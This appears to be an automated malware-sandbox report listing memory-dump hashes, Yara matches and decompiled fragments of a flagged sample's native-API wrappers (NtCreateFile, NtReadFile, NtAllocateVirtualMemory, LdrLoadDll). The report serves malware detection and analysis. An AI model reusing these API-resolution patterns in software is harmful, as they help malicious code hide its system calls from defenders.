                                                                      • Source File: 00000000.00000002.747446499.0000000006890000.00000040.00000001.sdmp, Offset: 06890000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25927ed2701e049e17e024a4f58ad91d3cb9ac4face04a80baaa4666161e2ce6
                                                                      • Instruction ID: 8d42d01e2c0e10686d3fddab8fc18f6717a8465f8010ff4c6876a34c6ea50473
                                                                      • Opcode Fuzzy Hash: 25927ed2701e049e17e024a4f58ad91d3cb9ac4face04a80baaa4666161e2ce6
                                                                      • Instruction Fuzzy Hash: FCE01238900208EFCB44DFA4D848A9DBBB5BB09321F108098EA4467320D731AA94DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747446499.0000000006890000.00000040.00000001.sdmp, Offset: 06890000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25927ed2701e049e17e024a4f58ad91d3cb9ac4face04a80baaa4666161e2ce6
                                                                      • Instruction ID: 5419c144ce09d017d588671fd7b51e5566c6613f99e521e4bccbcf0d8ace2627
                                                                      • Opcode Fuzzy Hash: 25927ed2701e049e17e024a4f58ad91d3cb9ac4face04a80baaa4666161e2ce6
                                                                      • Instruction Fuzzy Hash: 2BE01238D00208EFCB44EFA4D848A9DBBB5BB09311F108098E94467320D731AA54DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747446499.0000000006890000.00000040.00000001.sdmp, Offset: 06890000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79ba2360ec2f85ac45161ab405d8b91378ca0249451d8e723eabdec40d429994
                                                                      • Instruction ID: f1555f195681ef24717c64397ff32128663f96b67eb6991eb8e99cd0c139615b
                                                                      • Opcode Fuzzy Hash: 79ba2360ec2f85ac45161ab405d8b91378ca0249451d8e723eabdec40d429994
                                                                      • Instruction Fuzzy Hash: 5CE0B638D20208DFCB90DFA8D488A9DBBF4EB08615F5080E9D908D7350E6319A44CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747446499.0000000006890000.00000040.00000001.sdmp, Offset: 06890000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bfb834366dda6c68ccde4991e669abc976dd0f1c06b5bdde544d5fa9df6f1fa
                                                                      • Instruction ID: a3a6ad037d34da5e7527f4fdc901927fe6fc2b7fd2dabc3fb79134b58823caf8
                                                                      • Opcode Fuzzy Hash: 3bfb834366dda6c68ccde4991e669abc976dd0f1c06b5bdde544d5fa9df6f1fa
                                                                      • Instruction Fuzzy Hash: 7FE01730D1531CEFCB54EFB8D44829DBBB5AF04209F6045EDDA0893340E7319A85CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747446499.0000000006890000.00000040.00000001.sdmp, Offset: 06890000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5b8295dd0894dc66363c4e1625656fae3f74f17a268adba3bedffa696a5c2d8
                                                                      • Instruction ID: 0664ee064a8b4cd0b31ff555d150514ea6349640f9f580c2f6c6e1bcacc42781
                                                                      • Opcode Fuzzy Hash: d5b8295dd0894dc66363c4e1625656fae3f74f17a268adba3bedffa696a5c2d8
                                                                      • Instruction Fuzzy Hash: 2FD0A930802208DBC728CBA0950076AB729EB01209F4000ACC90852200EB325940CA91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a21ae48c0a79e1f1a97b81bd6957e68ffad62d337df2084ecc8b454f42bea5e5
                                                                      • Instruction ID: 747bd60e1aa17e09c1c73284cac760852a007d578e9bcde80503c926b5b260fe
                                                                      • Opcode Fuzzy Hash: a21ae48c0a79e1f1a97b81bd6957e68ffad62d337df2084ecc8b454f42bea5e5
                                                                      • Instruction Fuzzy Hash: C8925D30A00609DFCB54CF68C984AAEBBF2BF49324F15855DE825DB2A6D730EE41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e294dc4de764172ace0d04919a208f003de21477e1dc8fdd73079f6d9b3c684
                                                                      • Instruction ID: 8a29e9a0c192f2ac53841a31cfbefe51b3f1852f20cc077e851451ae684bba2e
                                                                      • Opcode Fuzzy Hash: 4e294dc4de764172ace0d04919a208f003de21477e1dc8fdd73079f6d9b3c684
                                                                      • Instruction Fuzzy Hash: 5822F575A00218DFDB55CFA8C984F98BBB2FF48314F1580E9E609AB262DB319D91DF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 588f7af0df818de542eb296bc0c6cb9bf2e193e94ec8e243b9be91f0417337ae
                                                                      • Instruction ID: f8b78fab5116584f6b0c2e31169ead07cf8ae9cc92be607841556070054ab744
                                                                      • Opcode Fuzzy Hash: 588f7af0df818de542eb296bc0c6cb9bf2e193e94ec8e243b9be91f0417337ae
                                                                      • Instruction Fuzzy Hash: 59D10934C2075A8ACB00EFA4D8646DDB371FF95300F609B9AE1497B225EB706AC9CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebc53fe8703037142403209b1a54525d6c3107992dc49cd4f35b8e6924a66a4c
                                                                      • Instruction ID: d828413e416137d96463fb5e759eda20200468669d89a4a247338bb049cc6c13
                                                                      • Opcode Fuzzy Hash: ebc53fe8703037142403209b1a54525d6c3107992dc49cd4f35b8e6924a66a4c
                                                                      • Instruction Fuzzy Hash: C7D10934C2075A8ACB00EFA4D9646DDB371FF95300F60DB9AE1497B225EB706AD9CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97c7c8490abac92e29ccc5e128332a6ad50368db8e02b35bac21e632cc05d419
                                                                      • Instruction ID: 8c6eab3b1048b796442e25c237e6f77f31f1dcdef2ff4cb33753d4249bb0aae6
                                                                      • Opcode Fuzzy Hash: 97c7c8490abac92e29ccc5e128332a6ad50368db8e02b35bac21e632cc05d419
                                                                      • Instruction Fuzzy Hash: F8713E34B00168DFDB48AFB5985877EBBB7BFC8714B44C82E9446E7284DF3498019795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: acd7bea95b0abc338541aa4d45daf5afc6686d35e7827338cd4fbc157b1ef927
                                                                      • Instruction ID: 302f670bfabf467747b2efb098f0297b3dbb10d461b51234264568912abf9b4a
                                                                      • Opcode Fuzzy Hash: acd7bea95b0abc338541aa4d45daf5afc6686d35e7827338cd4fbc157b1ef927
                                                                      • Instruction Fuzzy Hash: DA315AB8D05208EFDB54CFA9D884AADBBF1BF89360F249129E854A7350D7349941CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: efc82a8fede5b39d13347da60721fc7cc577926654053374a9a56fecd084f07a
                                                                      • Instruction ID: e3af59fa3ac56f26fc468f544aa029f6d406f7019626856f73b3fafe0cf0c531
                                                                      • Opcode Fuzzy Hash: efc82a8fede5b39d13347da60721fc7cc577926654053374a9a56fecd084f07a
                                                                      • Instruction Fuzzy Hash: 35315DB4D05208EFCB54CFA9D984AADBBF1BF89320F249129E814B7350D7349941CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8753d6495212062c1a792755ac22a7bb7a8704a125abb5aff48e371f745db5e6
                                                                      • Instruction ID: e92233255d1e544491a44e3e627edf8af53080a54e6bac0a2c4fad04a3afe4f3
                                                                      • Opcode Fuzzy Hash: 8753d6495212062c1a792755ac22a7bb7a8704a125abb5aff48e371f745db5e6
                                                                      • Instruction Fuzzy Hash: 7A21E371E056189BEB18CFABD84069DFBF3AFC9210F18C1BED858A7255EB3149468F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0295ad2201bbe4ca8248bfa478496f91f47a5bbd7172bdd3563921c53ad8ef47
                                                                      • Instruction ID: 85a69dc183684a973d609cb8bdbc09f3d8068601205e9afe76b317fbab3b50f6
                                                                      • Opcode Fuzzy Hash: 0295ad2201bbe4ca8248bfa478496f91f47a5bbd7172bdd3563921c53ad8ef47
                                                                      • Instruction Fuzzy Hash: C421A5B1D016088BEB58CFABC94429EFAF3AFC8314F14C56EC918AB265EB354506CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30df899deefed3003eac99174157a2bee5cd273cd0e035f7062d4008865b1d24
                                                                      • Instruction ID: 536cf29bdaa04895903d0ce66b3298a8d5e23dfd1703fa47bef72cca7b22b4b1
                                                                      • Opcode Fuzzy Hash: 30df899deefed3003eac99174157a2bee5cd273cd0e035f7062d4008865b1d24
                                                                      • Instruction Fuzzy Hash: F521CF71E016189BEB18CFABD94069EFAF7AFC8210F14C16AD819A7259EB3149468F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f72c9611912a7c11f746fc398393e1be484939e4de96c8ae19a47713adc7353
                                                                      • Instruction ID: 7501b8ae1dd2a4a8cfd2d8203a9ec4ed605a6a1bbe834ee239dde1ff1847af00
                                                                      • Opcode Fuzzy Hash: 9f72c9611912a7c11f746fc398393e1be484939e4de96c8ae19a47713adc7353
                                                                      • Instruction Fuzzy Hash: FC2197B1D016088BEB58CFABC94429EFAF7AFC8314F14C56AC518AB264EB354506CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1cae0ff10218d5b61ac353af1a657bc14b844866e6790e24c2817dd60e3f063
                                                                      • Instruction ID: 99ca3cc1ec67e3ac4672c3ee0591da761bce0e3ad11236110b16038746a4c0b2
                                                                      • Opcode Fuzzy Hash: b1cae0ff10218d5b61ac353af1a657bc14b844866e6790e24c2817dd60e3f063
                                                                      • Instruction Fuzzy Hash: BE0154B5D052489F8B14CFA9D4418EEFBF1AF5A310F14A16AE894B7310E7309951DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.747330588.00000000067C0000.00000040.00000001.sdmp, Offset: 067C0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                                      • Instruction ID: c151967a8b111465c17afaaaafa33ea01b222428f5ec3b90490182855f4cbb1f
                                                                      • Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                                      • Instruction Fuzzy Hash: 7DF03FB5D052089F8F14DFA9D5418EEFBF2AB5A310F10A16AE814B3310E73599518FA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 752142053-704622139
                                                                      • Opcode ID: 0309c1e27a7017a578041bf9f6687d5a5da7d91913464a20562aa3ca77f4ebcb
                                                                      • Instruction ID: 54c9fe1947a3d53e2c7a55ac3a13e1845583ae603015870717c317e0d79f61eb
                                                                      • Opcode Fuzzy Hash: 0309c1e27a7017a578041bf9f6687d5a5da7d91913464a20562aa3ca77f4ebcb
                                                                      • Instruction Fuzzy Hash: F50124B6200108ABCB14DF99DC80DEB77ADEF8C354F158249FE1CA3241C630E8508BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      • Opcode ID: aad0e7a4c1948a1dbde25b91e1d51e8dd343484347a5f4efff6b117b6d14bd34
                                                                      • Instruction ID: ab0137bd93cdcf822cc494a37f2f6fe77286ff319b2a2ea0e2c8aba401b2d82f
                                                                      • Opcode Fuzzy Hash: aad0e7a4c1948a1dbde25b91e1d51e8dd343484347a5f4efff6b117b6d14bd34
                                                                      • Instruction Fuzzy Hash: BAF01DB6110049ABCB04DF98DC94CEB77ADFF8C354B198649FD5D93202C534E8558BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                      				void* _t18;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      
                                                                      				_t13 = _a4;
                                                                      				_t28 = _a4 + 0xc48;
                                                                      				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                      				_t4 =  &_a40; // 0x413a21
                                                                      				_t6 =  &_a32; // 0x413d62
                                                                      				_t12 =  &_a8; // 0x413d62
                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                      				return _t18;
                                                                      			}






                                                                      0x00418683
                                                                      0x0041868f
                                                                      0x00418697
                                                                      0x0041869c
                                                                      0x004186a2
                                                                      0x004186bd
                                                                      0x004186c5
                                                                      0x004186c9

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                      				char _v536;
                                                                      				void* _t15;
                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_v8 =  &_v536;
                                                                      				_t15 = E0041AF60( &_v12, 0x104, _a8);
                                                                      				_t31 = _t30 + 0xc;
                                                                      				if(_t15 != 0) {
                                                                      					_t17 = E0041B380(__eflags, _v8);
                                                                      					_t32 = _t31 + 4;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						E0041B600( &_v12, 0);
                                                                      						_t32 = _t32 + 8;
                                                                      					}
                                                                      					_t18 = E00419710(_v8);
                                                                      					_v16 = _t18;
                                                                      					__eflags = _t18;
                                                                      					if(_t18 == 0) {
                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                      						return _v16;
                                                                      					}
                                                                      					return _t18;
                                                                      				} else {
                                                                      					return _t15;
                                                                      				}
                                                                      			}













                                                                      0x00409b4c
                                                                      0x00409b4f
                                                                      0x00409b54
                                                                      0x00409b59
                                                                      0x00409b63
                                                                      0x00409b68
                                                                      0x00409b6b
                                                                      0x00409b6d
                                                                      0x00409b75
                                                                      0x00409b7a
                                                                      0x00409b7a
                                                                      0x00409b81
                                                                      0x00409b89
                                                                      0x00409b8c
                                                                      0x00409b8e
                                                                      0x00409ba2
                                                                      0x00000000
                                                                      0x00409ba4
                                                                      0x00409baa
                                                                      0x00409b5e
                                                                      0x00409b5e
                                                                      0x00409b5e

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                      • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                      • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E004185CA(signed int __eax, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                                      				intOrPtr _v0;
                                                                      				long _t24;
                                                                      				void* _t34;
                                                                      
                                                                      				0xecccdb82(__eax | 0x00000052);
                                                                      				_t18 = _v0;
                                                                      				_t3 = _t18 + 0xc40; // 0xc40
                                                                      				E004191D0(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                                                      				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                                      				return _t24;
                                                                      			}






                                                                      0x004185ce
                                                                      0x004185d3
                                                                      0x004185df
                                                                      0x004185e7
                                                                      0x0041861d
                                                                      0x00418621

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2d83f30a3f1805aee23a71959be3a0e065d1de3ff59151e13068a43651f59577
                                                                      • Instruction ID: 40c6baee500311b211164ccbb8da71a6cdeaa0f5d937e7686bc9ebad61f94fde
                                                                      • Opcode Fuzzy Hash: 2d83f30a3f1805aee23a71959be3a0e065d1de3ff59151e13068a43651f59577
                                                                      • Instruction Fuzzy Hash: 3C01A8B2201108ABCB08CF99DC94DEB37A9AF8C754F158648FA1997281C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t21;
                                                                      				void* _t31;
                                                                      
                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                      				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t21;
                                                                      			}





                                                                      0x004185df
                                                                      0x004185e7
                                                                      0x0041861d
                                                                      0x00418621

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                      				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                      				return _t14;
                                                                      			}





                                                                      0x004187bf
                                                                      0x004187c7
                                                                      0x004187e9
                                                                      0x004187ed

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 47ec4ae846ed632dd1f453ce02b494ce5e7c6d77960902e170c2f5c6b913f0fa
                                                                      • Instruction ID: bc6a4b4d8940970a121edcb3a5a4a9ac022a468cf18fb58c54568c7f70a85c8a
                                                                      • Opcode Fuzzy Hash: 47ec4ae846ed632dd1f453ce02b494ce5e7c6d77960902e170c2f5c6b913f0fa
                                                                      • Instruction Fuzzy Hash: 3F9002B530100802D540719A44047460009A7D0345F51C021A5454554ECA998DD976A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f3754c50b1b75839283e006c6775a90fcc6525e87e836c13366f9938ce5dcfcd
                                                                      • Instruction ID: 95ffdbfd3b5caf7411de30102ae61edda10aa73f4ea4f09e33a3c19f2f98341b
                                                                      • Opcode Fuzzy Hash: f3754c50b1b75839283e006c6775a90fcc6525e87e836c13366f9938ce5dcfcd
                                                                      • Instruction Fuzzy Hash: BB900269311004034505A59A0704507004AA7D5395351C031F1405550CDA6188656161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1551548ede44ee2b18f9872144e928b5f35854fbd1d2b1743b9db44e23b27c66
                                                                      • Instruction ID: b33e80ce0843dd23f786bf9e0c2776c4aeb9eeb8f6855cad5696216e106f9a97
